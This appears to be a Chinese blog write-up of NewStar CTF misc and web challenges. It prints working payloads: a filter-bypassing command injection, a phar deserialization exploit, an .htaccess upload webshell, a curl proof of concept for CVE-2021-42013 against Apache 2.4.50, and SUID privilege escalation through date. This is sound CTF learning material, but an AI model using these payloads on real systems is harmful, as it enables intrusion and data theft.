NewStar CTF Week3Misc 4-5Web

最新推荐文章于 2024-04-22 14:07:29 发布
最新推荐文章于 2024-04-22 14:07:29 发布
阅读量790 收藏
点赞数 1
分类专栏: 比赛wp 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/127395581
版权

目录

<1> Week-3 Misc

(1) Whats HTTP

(2) qsdz's girlfriend 3

(3) WebShell!

(4) 混沌的图像

<1> Week-4 Web

(1) So Baby RCE(%0A进行rce rev|sort读取flag)

(2) UnserializeThree(%0d换行rce)

<2> week5-web

(1) Give me your photo PLZ(.htaccess配置文件漏洞)

(2) Unsafe Apache(CVE-2021-42013)

(3) So Baby RCE Again(suid-date越权读取)

<1> Week-3 Misc

(1) Whats HTTP

http的包都导出来,对比一下长度 发现了这个长度比较不一样的包 追踪http流

 得到一串base64:NjY2YzYxNjc3YjM0NjYzMzMzMzYzNDM5NjQzMDMzMzA2MzM2MzczNzM4MzQzMjM2MzkzNzMxNjIzNTM0NjQ2NDM3MzI2NTYzNjU3ZA==

解码得到:

666c61677b34663333363439643033306336373738343236393731623534646437326563657d

类似一一串hex编码 解码得到flag:flag{4f33649d030c6778426971b54dd72ece}

(2) qsdz's girlfriend 3

题目描述:

        我们入侵了qsdz的服务器,你可以在服务器中找到他真实的女朋友吗?qsdz的用户密码是Hikari(请用SSH连接)

我们用xshell连上ssh服务

 

在start.sh里看见flag在:/root/girlfriends/hasegawa_azusa

尝试cat一下:
cat: /root/girlfriends/hasegawa_azusa: Permission denied  然而没有权限

一、cp复制出来:cp -r /root/girlfriends/hasegawa_azusa /home/flag 然后cat出来

二、 查找系统有SUID权限的可执行文件

发现date  date -f读取

 

(3) WebShell!

题目描述:

        溯源攻击者窃取的文件内容!他用了蚁剑诶? Flag格式为:flag{WebShell密码_黑客获取的用户名_机密文件内容} 例如flag{cmd_root_secret}

可以一个一个找,也可以通过 过滤http contains "eval"看看有没有木马

webshell密码为:

 黑客获取的用户名:

 机密文件内容:

 所以flag为:flag{n3wst4r_www-data_Y0UAr3G00D}

 

(4) 混沌的图像

题目描述:

        听说之前考过LSB,那你还记得那道密码题吗?"

stefsolve 看到了一段png图片编码,save bin为flag.png

 010editor打开 文件末尾发现了参数k1,k2

 k1=3.5606267076894413,k2=3.9101741242346346,k=[106,80,198,220,47,18,19,230,42,202,207,196,214,132,188,190]

根据题目描述联想到WEEK1 Crypto题目中的chaos

NewStarCTF 公开赛第一周Writeup | Anyyy's Blog

替换掉k1k2k,而c就为flag.pngrgb数值列表

这里直接贴上现成的脚本:

from PIL import Image

img = Image.open('flag.png')
w,h=img.size
pic = []
for i in range(w):
    for j in range(h):
        (r, g, b) = img.getpixel((i,j))
        pic.append(r)
        pic.append(g)
        pic.append(b)

sum, r, k = 0, 1, [106,80,198,220,47,18,19,230,42,202,207,196,214,132,188,190]
k1,k2 = 3.5606267076894413, 3.9101741242346346
for i in k:
    sum += i
    r ^= i
a_1 = (sum/256) % 1
timea1 = 3 + int(1000 * a_1) % 30
b_1 = (r/256)
timeb1 = 3 + int(1000 * b_1) % 30
xc_1 = a_1 * b_1
yc_1 = (a_1 + b_1) % 1
data = (a_1, timea1, b_1, timeb1, xc_1, yc_1)
key = (k1,k2)

def LC(key, x, times, flags):
    (k1, k2) = key
    xn = []
    xn.append(x)
    if flags:
        xn.append(1 - 2 * xn[0]**2)
    else:
        xn.append(k2 * xn[0]**3 + (1 - k2)*xn[0])
    for i in range(times):
        assert xn[i]>=-1 and xn[i]<=1 and xn[i+1]>=-1 and xn[i+1]<=1
        if flags:
            xn.append((1 - 2 * xn[i]**2)*(k1 * xn[i+1]**3 + (1 - k1)*xn[i+1]))
        else:
            xn.append((k2 * xn[i]**3 + (1 - k2)*xn[i])*(1 - 2 * xn[i+1]**2))
    return xn[times + 1]

m, c = [], pic
miu, omiga = [], []
ta = timea1
tb = timeb1
all_list = []
for flag in c:
    miu.append(LC(key, a_1, ta, 1))
    omiga.append(LC(key, b_1, tb, 0))
    all_list.append(((int(miu[-1] * 1000) + int(omiga[-1] * 1000))%256)^flag)
    delta = flag/256
    for i in range(3):
        y = (yc_1 + delta) % 1
        y = k1 * y**3 + (1 - k1) * y
        x = xc_1
        x = k2 * x**3 + (1 - k2) * x
    ta = 3 + int(1000 * x) % 30
    tb = 3 + int(1000 * y) % 30

rgb_list = []
for i in range(0, len(all_list), 3):
    rgb_list.append(all_list[i:i+3])

width, height = 1300, 867 # flag.png的宽高
new_img = Image.new('RGB', (width, height))
idx = 0
for w1 in range(width):
    for h1 in range(height):
        new_img.putpixel((w1, h1), tuple(rgb_list[idx]))
        idx += 1
new_img.save('res-flag.png')
new_img.show()

运行之后得到新的图片,lsb发现flag

<1> Week-4 Web

(1) So Baby RCE(%0A进行rce rev|sort读取flag)

<?php
if(isset($_GET["cmd"])){
    if(preg_match('/et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|fl|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["cmd"])){
       echo "Don't Hack Me";
    }else{
        system($_GET["cmd"]);
    }

源码里preg_match过滤了好多命令,只能靠%0A多命令切换目录不断切换到/目录,发现flag

fl被过滤用?替代,读取flag用 rev或者sort

?cmd=%0Acd${IFS}..%0Acd${IFS}..%0Acd${IFS}..%0Asort${IFS}ffff?lllaaaaggggg

(2) UnserializeThree(%0d换行rce)

 查看源码发现 class.php

访问之后得到源码:

 <?php
highlight_file(__FILE__);
class Evil{
    public $cmd;
    public function __destruct()
    {
        if(!preg_match("/>|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){
            //Same point ,can you bypass me again?
            eval("#".$this->cmd); 
        }else{
            echo "No!";
        }
    }
}

file_exists($_GET['file']);

file_exists()函数可触发 phar反序列化

cmd过滤了 < > ? php和%0a 因此不可以用?><?php 来闭合前面的#号了,但我们还可以利用%0d

构造phar文件  

<?php
class Evil{
    public $cmd;
}
$test = new Evil();
$test->cmd= urldecode("%0d").'system("ls");';
echo serialize($test);
/* 文件名 */
$phar = new Phar("a.phar"); //文件名
$phar->startBuffering();
/* 设置stub,必须要以__HALT_COMPILER(); ?>结尾 */
$phar->setStub("<?php __HALT_COMPILER(); ?>");
/* 设置自定义的metadata,序列化存储,解析时会被反序列化 */
$phar->setMetaData($test);
$phar->stopBuffering();
?>

 但是.phar后缀被限制了,hacker!

我们改后缀为.png ?file=phar://路径 执行ls命令,发现flag文件

 再生成一个cat命令的phar文件重复上述操作即可得到flag

<2> week5-web

(1) Give me your photo PLZ(.htaccess配置文件漏洞)

.htaccess解析漏洞,上传.htaccess 内容为:AddType application/x-httpd-php .jpg

再次上传 123.jpg图片木马  执行 cat /flag命令后看见  那么flag就在phpinfo里

(2) Unsafe Apache(CVE-2021-42013)

Apache/2.4.50  存在命令执行漏洞漏洞 CVE-2021-42013

poc:curl -v --data "echo;id" 'http://ip:port/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

 cat 即可

(3) So Baby RCE Again(suid-date越权读取)

?cmd=ls / | tee 1.txt

tee 命令外带命令执行结果

?cmd=cat /ffll444aaggg | tee 1.txt

未果。。。700文件

SUID提权:find / -perm -u=s -type f 2>/dev/null > ./1.txt

find / -user root -perm -4000 -print 2>/dev/null

 看见date,从其他师傅处得知: date -f可以越权读取

?cmd=echo '<?php eval($_POST[a]); ?>' > a.php 写入一句话木马 蚁剑连接

date -f ffl*得到flag

葫芦娃42
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
Catfish(鲶鱼)cms-带有越权漏洞的源码.zip
03-16
Catfish(鲶鱼)cms-带有越权漏洞的源码,亲测真实有效可靠,如有侵权,请联系CSDN管理员删除即可
BUUCTF NewStarCTF 公开赛赛道Week4 Writeup
末初的CSDN博客
10-16 3283
BUUCTF NewStarCTF 公开赛赛道Week4 Writeup
# NewStarCTF 公开赛赛道 WEEK4
as you know, nlp is fantasitc!
10-17 890
payload注意用url编码将base64编码后的特殊字符编码。文件上传+phar反序列化。生成下payload就能打。简单的反序列化题,用。
NewStarCTF 公开赛 第四周 学习记录
m0_64815693的博客
10-16 2044
NewStarCTF 公开赛赛道 web wp
Newstar 新生赛week2
weixin_63231007的博客
10-07 974
Word-For-You(2 Gen 报错注入)留言之后,点击这里 发现了name参数 1' 测试一下发现报错1' or 1=1%23 之后报错没了,证实存在报错注入?爆出数据库名 wfy?爆出表名 : wfy_admin,wfy_comments,wfy_info?爆出表名: id,text,user,name,display?正着读读不出来?倒着读 读出倒序的flag,}sr0rre_emos_ek2m_t4uJ{galf。
[NewStarCTF 2023 公开赛道] week1
weixin_52640415的博客
10-06 2649
BUUCTF NewStar2023 新生赛公开赛道
2023 NewStarCTF --- wp
3tefanie丶zhou的博客
10-09 3219
【活着得,怎么就轻松惬意了,无需愧疚。】
NewStarCTF 公开赛赛道week3 web writeup
your_friends的博客
10-10 1390
里面完全的没有验证,而且应该是一个简单的判断,判断成绩是否达到了425分,那么应该是使用update更新数据库信息,让火华师傅的成绩大于425即可。这里提供两种方法,一种是用replace into替换掉update,也可以使用预编译的方式。但是点击没用查询火华的成绩时候,出现两个火华,应该是多了直接删除即可。接着直接访问文件就能RCE(用bp发包,否则这里的符号会被编码)而刚进入的页面是有一个可点击的页面进去看下verify.php。题目名字可以看出来,多SQL,堆叠注入。直接拉网上的exp打。
NewStarCTF 2023 公开赛道部分wp
m0_66458291的博客
10-02 351
参加NewStarCTF 2023 公开赛道将自己做出来的题目进行总结一下,包括web和密码学两个部分的部分题目
CTF-misc中的F5刷新可以使用到的工具
11-03
F5触发的HTTP请求的请求头中通常包含了If-Modified-Since 或 If-None-Match字段,或者两者兼有。CTRL+F5触发的HTTP请求的请求头中没有上面的那两个头 所以说你非常需要此工具!!!!!
ctf-tools-linux-master.zip
06-22
ctf集成工具包-linux版
ctfweb攻防工具-御剑1.5.7z
04-06
御剑1.5版本
CTF-Hacked-uhc-WEB
03-22
CTF破解的uhc-WEB我为UHCv33制造的机器priv esc是主机的DockerEscape,因此主机将是您的​​机器:)官方WriteUP-> 开始: docker build -t hacked .docker run -dp 80:80 hacked --privileged
php开发工程师系统性教学】——Laravel框架(验证码)的配置和使用的保姆式教程
php优质创造者
04-21 1537
👨‍💻。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
最新发布
ALex_zry的博客
04-22 450
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 547
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
upload-labs
XiaoYeZhu_1314的博客
04-18 238
完成upload靶场,通过中国蚁剑读取服务器的目录
ctf工具之binwalk--windows下(misc).rar
07-30
binwalk是一款用于分析和提取嵌入在二进制文件中的文件和数据的工具。对于CTF比赛来说,binwalk可以帮助我们进行文件的分析和提取,从而更好地理解题目并解决问题。 在Windows下使用binwalk,我们首先需要在官方网站(https://github.com/ReFirmLabs/binwalk)下载并安装binwalk的Windows版本。安装完成后,我们可以在命令行中使用binwalk命令进行操作。 拿到CTF题目中的misc.rar文件后,我们可以使用binwalk来分析该文件。在命令行中,我们输入以下命令: binwalk misc.rar binwalk会对该文件进行分析,并将分析结果显示在命令行中。它会检测并提取出文件中的隐藏信息,并尝试识别文件中可能存在的其他类型文件(如图像、压缩包等)。 除了显示分析结果外,binwalk还支持提取文件中的隐藏文件。我们可以使用以下命令来提取隐藏文件: binwalk -e misc.rar 这会将隐藏在misc.rar中的文件提取到当前目录中。我们可以通过查看提取出的文件来获得进一步的线索或解答。 总之,binwalk是一款强大的CTF工具,它可以帮助我们分析和提取嵌入在二进制文件中的文件和数据。在Windows下使用binwalk可以通过命令行进行操作,从而更好地解决CTF比赛中的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值